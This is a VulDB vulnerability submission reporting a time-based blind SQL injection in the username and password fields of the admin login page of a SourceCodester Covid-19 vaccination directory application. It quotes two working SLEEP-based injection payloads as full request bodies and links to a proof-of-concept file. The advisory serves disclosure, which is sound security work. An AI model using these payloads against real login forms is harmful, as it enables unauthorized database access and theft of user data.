| Titel | SQL injection vulnerability exists in txtpassword and txtusername parameter of design-and-implementation-covid-19-directory-vacination |
|---|
| Beschreibung | SQL injection vulnerability exists in txtpassword and txtusername parameter of /admin/login.php file of design-and-implementation-covid-19-directory-vacination
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
Payload: txtusername=admin&txtpassword=123456' AND (SELECT 9886 FROM (SELECT(SLEEP(5)))oFWj)-- FIko&btnlogin=
or txtusername=admin' AND (SELECT 1895 FROM (SELECT(SLEEP(5)))ocUe)-- DEnO&txtpassword=123456&btnlogin= |
|---|
| Quelle | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/covid-19-vaccination%20vlun%20pdf/covid-19-vaccination%20sql(6).pdf |
|---|
| Benutzer | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Einreichung | 11.03.2023 15:56 (vor 3 Jahren) |
|---|
| Moderieren | 11.03.2023 18:39 (3 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 222851 [SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System /admin/login.php SQL Injection] |
|---|
| Punkte | 20 |
|---|